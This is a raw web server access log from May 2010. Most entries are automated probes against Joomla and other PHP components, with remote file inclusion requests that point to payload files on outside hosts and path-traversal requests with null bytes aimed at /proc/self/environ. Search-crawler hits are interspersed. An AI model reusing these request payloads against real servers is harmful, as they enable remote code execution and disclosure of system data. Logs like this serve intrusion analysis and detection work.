212.59.6.16 - - [30/May/2010:06:43:57 -0500] "GET /logs/access_log.1272412800/index.php?option=com_sbsfile&controller=http://mb-searchandrescue.com/Ckrid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
212.59.6.16 - - [30/May/2010:06:43:57 -0500] "GET /index.php?option=com_sbsfile&controller=http://mb-searchandrescue.com/Ckrid1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
212.59.6.16 - - [30/May/2010:06:43:57 -0500] "GET /logs/index.php?option=com_sbsfile&controller=http://mb-searchandrescue.com/Ckrid1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
114.108.177.125 - - [30/May/2010:06:47:38 -0500] "GET /logs/access_log.1272412800/index.php?option=com_sbsfile&controller=http://mb-searchandrescue.com/Ckrid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
114.108.177.125 - - [30/May/2010:06:47:38 -0500] "GET /logs/index.php?option=com_sbsfile&controller=http://mb-searchandrescue.com/Ckrid1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
114.108.177.125 - - [30/May/2010:06:47:38 -0500] "GET /index.php?option=com_sbsfile&controller=http://mb-searchandrescue.com/Ckrid1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
80.65.166.74 - - [30/May/2010:06:48:03 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
80.65.166.74 - - [30/May/2010:06:48:04 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
69.175.84.122 - - [30/May/2010:06:52:20 -0500] "GET /ndex.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 292 "-""Mozilla/5.0"
69.175.84.122 - - [30/May/2010:06:52:20 -0500] "GET /logs/ndex.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
69.175.84.122 - - [30/May/2010:06:52:20 -0500] "GET /logs/access_log.1262649600/ndex.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
69.175.84.122 - - [30/May/2010:06:52:21 -0500] "GET /logs/access_log.1271635200/ndex.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
69.175.84.122 - - [30/May/2010:06:52:21 -0500] "GET /logs/ndex.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
69.175.84.122 - - [30/May/2010:06:52:22 -0500] "GET /logs/access_log.1271635200/ndex.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
69.175.84.122 - - [30/May/2010:06:52:22 -0500] "GET /ndex.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 292 "-""Mozilla/5.0"
69.175.84.122 - - [30/May/2010:06:52:22 -0500] "GET /logs/access_log.1262649600/ndex.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
208.115.111.248 - - [30/May/2010:06:52:45 -0500] "GET /logs/access_log.1238198400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [30/May/2010:06:52:46 -0500] "GET /logs/access_log.1238544000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [30/May/2010:06:52:48 -0500] "GET /logs/access_log.1238630400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
69.175.84.122 - - [30/May/2010:06:52:50 -0500] "GET /ndex.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 292 "-""Mozilla/5.0"
69.175.84.122 - - [30/May/2010:06:52:50 -0500] "GET /logs/ndex.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
69.175.84.122 - - [30/May/2010:06:52:50 -0500] "GET /logs/access_log.1262649600/ndex.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
208.115.111.248 - - [30/May/2010:06:52:50 -0500] "GET /logs/access_log.1238716800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
69.175.84.122 - - [30/May/2010:06:52:50 -0500] "GET /logs/access_log.1271635200/ndex.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
208.115.111.248 - - [30/May/2010:06:52:53 -0500] "GET /logs/access_log.1238976000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [30/May/2010:06:52:55 -0500] "GET /logs/access_log.1239062400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [30/May/2010:06:52:58 -0500] "GET /logs/access_log.1239235200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [30/May/2010:06:53:00 -0500] "GET /logs/access_log.1239321600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [30/May/2010:06:53:03 -0500] "GET /logs/access_log.1239494400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [30/May/2010:06:53:05 -0500] "GET /logs/access_log.1239580800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
80.65.166.74 - - [30/May/2010:06:56:11 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
69.94.106.71 - - [30/May/2010:06:57:11 -0500] "GET /logs/index2.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
69.94.106.71 - - [30/May/2010:06:57:11 -0500] "GET /index2.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
72.55.146.200 - - [30/May/2010:07:02:02 -0500] "GET /logs/access_log.1205107200//index.php?option=com_typedcontent&task=section&id=10&Itemid=50&mosConfig_absolute_path=http://www.act.scouts.asn.au/SazCart/id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
72.55.146.200 - - [30/May/2010:07:02:02 -0500] "GET /logs//index.php?option=com_typedcontent&task=section&id=10&Itemid=50&mosConfig_absolute_path=http://www.act.scouts.asn.au/SazCart/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
72.55.146.200 - - [30/May/2010:07:02:02 -0500] "GET //index.php?option=com_typedcontent&task=section&id=10&Itemid=50&mosConfig_absolute_path=http://www.act.scouts.asn.au/SazCart/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
65.55.51.117 - - [30/May/2010:07:05:08 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.51.117 - - [30/May/2010:07:06:03 -0500] "GET /logs/access_log.1170979200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.47 - - [30/May/2010:07:11:57 -0500] "GET /logs/access_log.1210032000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.201 - - [30/May/2010:07:12:03 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
193.126.206.28 - - [30/May/2010:07:15:46 -0500] "GET //mcf.php?content=http://www.boomong.com//bbs/data/idxx.txt??? HTTP/1.1" 404 292 "-""Mozilla/5.0"
193.126.206.28 - - [30/May/2010:07:15:46 -0500] "GET /logs/access_log.1271548800//mcf.php?content=http://www.boomong.com//bbs/data/idxx.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
193.126.206.28 - - [30/May/2010:07:15:46 -0500] "GET /logs//mcf.php?content=http://www.boomong.com//bbs/data/idxx.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
66.135.61.13 - - [30/May/2010:07:17:26 -0500] "GET //mcf.php?content=http://www.boomong.com//bbs/data/idxx.txt??? HTTP/1.1" 404 292 "-""Mozilla/5.0"
66.135.61.13 - - [30/May/2010:07:17:26 -0500] "GET /logs//mcf.php?content=http://www.boomong.com//bbs/data/idxx.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
66.135.61.13 - - [30/May/2010:07:17:26 -0500] "GET /logs/access_log.1271548800//mcf.php?content=http://www.boomong.com//bbs/data/idxx.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
66.135.61.13 - - [30/May/2010:07:17:28 -0500] "GET //mcf.php?content=http://www.boomong.com//bbs/data/idxx.txt??? HTTP/1.1" 404 292 "-""Mozilla/5.0"
66.135.61.13 - - [30/May/2010:07:17:28 -0500] "GET /logs/access_log.1271548800//mcf.php?content=http://www.boomong.com//bbs/data/idxx.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
66.135.61.13 - - [30/May/2010:07:17:28 -0500] "GET /logs//mcf.php?content=http://www.boomong.com//bbs/data/idxx.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
91.121.145.89 - - [30/May/2010:07:18:02 -0500] "GET /logs/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.145.89 - - [30/May/2010:07:18:03 -0500] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.104.108 - - [30/May/2010:07:18:06 -0500] "GET /logs/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.104.108 - - [30/May/2010:07:18:06 -0500] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
80.65.166.74 - - [30/May/2010:07:18:54 -0500] "GET /logs/access_log.1273363200/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
80.65.166.74 - - [30/May/2010:07:18:54 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
80.65.166.74 - - [30/May/2010:07:18:55 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
207.46.199.47 - - [30/May/2010:07:19:56 -0500] "GET /logs/access_log.1263168000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
72.30.142.216 - - [30/May/2010:07:22:26 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.142.216 - - [30/May/2010:07:22:26 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
80.65.166.74 - - [30/May/2010:07:28:47 -0500] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
80.65.166.74 - - [30/May/2010:07:28:47 -0500] "GET /logs/access_log.1271548800//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
80.65.166.74 - - [30/May/2010:07:28:47 -0500] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
80.65.166.74 - - [30/May/2010:07:28:54 -0500] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
80.65.166.74 - - [30/May/2010:07:28:54 -0500] "GET /logs/access_log.1271548800//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
80.65.166.74 - - [30/May/2010:07:28:54 -0500] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
80.65.166.74 - - [30/May/2010:07:31:03 -0500] "GET /logs/access_log.1272412800//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
80.65.166.74 - - [30/May/2010:07:31:35 -0500] "GET /logs/access_log.1270771200//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
80.65.166.74 - - [30/May/2010:07:32:17 -0500] "GET /logs/access_log.1272412800//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
80.65.166.74 - - [30/May/2010:07:32:23 -0500] "GET /logs/access_log.1270771200//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
207.46.204.192 - - [30/May/2010:07:37:56 -0500] "GET /logs/access_log.1208217600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
203.72.226.120 - - [30/May/2010:07:38:15 -0500] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 334 "-""libwww-perl/5.805"
203.72.226.120 - - [30/May/2010:07:38:15 -0500] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 329 "-""libwww-perl/5.805"
76.12.58.212 - - [30/May/2010:07:40:28 -0500] "GET /logs//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
76.12.58.212 - - [30/May/2010:07:40:28 -0500] "GET //index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
67.227.143.132 - - [30/May/2010:07:41:19 -0500] "GET /logs//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
67.227.143.132 - - [30/May/2010:07:41:19 -0500] "GET //index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
93.174.120.20 - - [30/May/2010:07:45:56 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
213.175.219.58 - - [30/May/2010:07:46:01 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.823"
213.175.219.58 - - [30/May/2010:07:46:01 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.823"
93.174.120.20 - - [30/May/2010:07:47:33 -0500] "GET //index.php?option=com_webeecomment&controller=http://kangnung.org/zb/Ckrid1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
93.174.120.20 - - [30/May/2010:07:47:33 -0500] "GET /logs/access_log.1271635200//index.php?option=com_webeecomment&controller=http://kangnung.org/zb/Ckrid1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
93.174.120.20 - - [30/May/2010:07:47:33 -0500] "GET /logs//index.php?option=com_webeecomment&controller=http://kangnung.org/zb/Ckrid1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
212.59.6.16 - - [30/May/2010:07:47:58 -0500] "GET //index.php?option=com_webeecomment&controller=http://kangnung.org/zb/Ckrid1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
212.59.6.16 - - [30/May/2010:07:47:58 -0500] "GET /logs//index.php?option=com_webeecomment&controller=http://kangnung.org/zb/Ckrid1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
212.59.6.16 - - [30/May/2010:07:47:58 -0500] "GET /logs/access_log.1271635200//index.php?option=com_webeecomment&controller=http://kangnung.org/zb/Ckrid1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
207.46.13.87 - - [30/May/2010:07:48:27 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
93.174.120.20 - - [30/May/2010:07:48:34 -0500] "GET //index.php?option=com_webeecomment&controller=http://kangnung.org/zb/Ckrid1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
93.174.120.20 - - [30/May/2010:07:48:34 -0500] "GET /logs/access_log.1271635200//index.php?option=com_webeecomment&controller=http://kangnung.org/zb/Ckrid1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
93.174.120.20 - - [30/May/2010:07:48:34 -0500] "GET /logs//index.php?option=com_webeecomment&controller=http://kangnung.org/zb/Ckrid1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
69.175.14.66 - - [30/May/2010:07:49:16 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
69.175.14.66 - - [30/May/2010:07:49:16 -0500] "GET /logs/access_log.1271548800//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 404 374 "-""Mozilla/5.0"
69.175.14.66 - - [30/May/2010:07:49:16 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
200.43.180.250 - - [30/May/2010:07:49:45 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
114.108.177.125 - - [30/May/2010:07:51:26 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
114.108.177.125 - - [30/May/2010:07:52:50 -0500] "GET //index.php?option=com_webeecomment&controller=http://kangnung.org/zb/Ckrid1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
114.108.177.125 - - [30/May/2010:07:52:50 -0500] "GET /logs//index.php?option=com_webeecomment&controller=http://kangnung.org/zb/Ckrid1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
114.108.177.125 - - [30/May/2010:07:52:55 -0500] "GET /logs/access_log.1271635200//index.php?option=com_webeecomment&controller=http://kangnung.org/zb/Ckrid1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
87.250.255.243 - - [30/May/2010:07:52:58 -0500] "GET /logs/access_log.1263081600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
76.12.58.212 - - [30/May/2010:07:53:21 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
76.12.58.212 - - [30/May/2010:07:53:21 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
67.227.143.132 - - [30/May/2010:07:53:27 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
67.227.143.132 - - [30/May/2010:07:53:27 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
67.195.112.180 - - [30/May/2010:07:55:59 -0500] "GET /logs/access_log.1165449600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
200.43.180.250 - - [30/May/2010:07:56:20 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
67.195.112.180 - - [30/May/2010:07:56:31 -0500] "GET /logs/access_log.1274745600 HTTP/1.0" 200 679778 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
76.12.58.212 - - [30/May/2010:07:57:46 -0500] "GET /logs/access_log.1273017600//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
76.12.58.212 - - [30/May/2010:07:57:47 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
76.12.58.212 - - [30/May/2010:07:57:47 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
67.227.143.132 - - [30/May/2010:07:59:18 -0500] "GET /logs/access_log.1273017600//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
67.227.143.132 - - [30/May/2010:07:59:18 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
67.227.143.132 - - [30/May/2010:07:59:18 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
217.199.218.22 - - [30/May/2010:07:59:34 -0500] "GET /logs/access_log.1271116800//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.ivpbrasil.org/id1.txt???? HTTP/1.1" 404 358 "-""Mozilla/5.0"
217.199.218.22 - - [30/May/2010:07:59:34 -0500] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.ivpbrasil.org/id1.txt???? HTTP/1.1" 404 331 "-""Mozilla/5.0"
217.199.218.22 - - [30/May/2010:07:59:34 -0500] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.ivpbrasil.org/id1.txt???? HTTP/1.1" 404 336 "-""Mozilla/5.0"
208.113.195.20 - - [30/May/2010:08:02:50 -0500] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
212.59.6.16 - - [30/May/2010:08:02:58 -0500] "GET /logs/index.php?option=com_sbsfile&controller=http://kangnung.org/zb/Ckrid1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
212.59.6.16 - - [30/May/2010:08:02:58 -0500] "GET /index.php?option=com_sbsfile&controller=http://kangnung.org/zb/Ckrid1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
212.59.6.16 - - [30/May/2010:08:02:58 -0500] "GET /logs/access_log.1272412800/index.php?option=com_sbsfile&controller=http://kangnung.org/zb/Ckrid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
174.34.163.101 - - [30/May/2010:08:03:59 -0500] "GET /logs/access_log.1272412800////?_PHPLIB[libdir]=http://kangnung.org/zb/s1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
174.34.163.101 - - [30/May/2010:08:03:59 -0500] "GET /logs////?_PHPLIB[libdir]=http://kangnung.org/zb/s1.txt? HTTP/1.1" 200 7550 "-""Mozilla/5.0"
174.34.163.101 - - [30/May/2010:08:03:59 -0500] "GET ////?_PHPLIB[libdir]=http://kangnung.org/zb/s1.txt? HTTP/1.1" 200 1005 "-""Mozilla/5.0"
174.34.163.101 - - [30/May/2010:08:03:59 -0500] "GET ////?_PHPLIB[libdir]=http://kangnung.org/zb/s1.txt? HTTP/1.1" 200 1005 "-""Mozilla/5.0"
174.34.163.101 - - [30/May/2010:08:03:59 -0500] "GET /logs/access_log.1272412800////?_PHPLIB[libdir]=http://kangnung.org/zb/s1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
174.34.163.101 - - [30/May/2010:08:03:59 -0500] "GET /logs////?_PHPLIB[libdir]=http://kangnung.org/zb/s1.txt? HTTP/1.1" 200 7550 "-""Mozilla/5.0"
174.34.163.101 - - [30/May/2010:08:04:04 -0500] "GET /logs/access_log.1270857600////?_PHPLIB[libdir]=http://kangnung.org/zb/s1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
174.34.163.101 - - [30/May/2010:08:04:04 -0500] "GET /logs/access_log.1270857600////?_PHPLIB[libdir]=http://kangnung.org/zb/s1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
74.124.198.60 - - [30/May/2010:08:04:42 -0500] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
74.124.198.60 - - [30/May/2010:08:04:42 -0500] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
74.124.198.60 - - [30/May/2010:08:04:42 -0500] "GET /logs/access_log.1271548800//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
207.46.13.91 - - [30/May/2010:08:04:57 -0500] "GET /logs/access_log.1200268800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
69.94.137.93 - - [30/May/2010:08:05:09 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
74.124.198.60 - - [30/May/2010:08:05:09 -0500] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
74.124.198.60 - - [30/May/2010:08:05:09 -0500] "GET /logs/access_log.1271548800//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
74.124.198.60 - - [30/May/2010:08:05:09 -0500] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
69.94.137.93 - - [30/May/2010:08:05:12 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
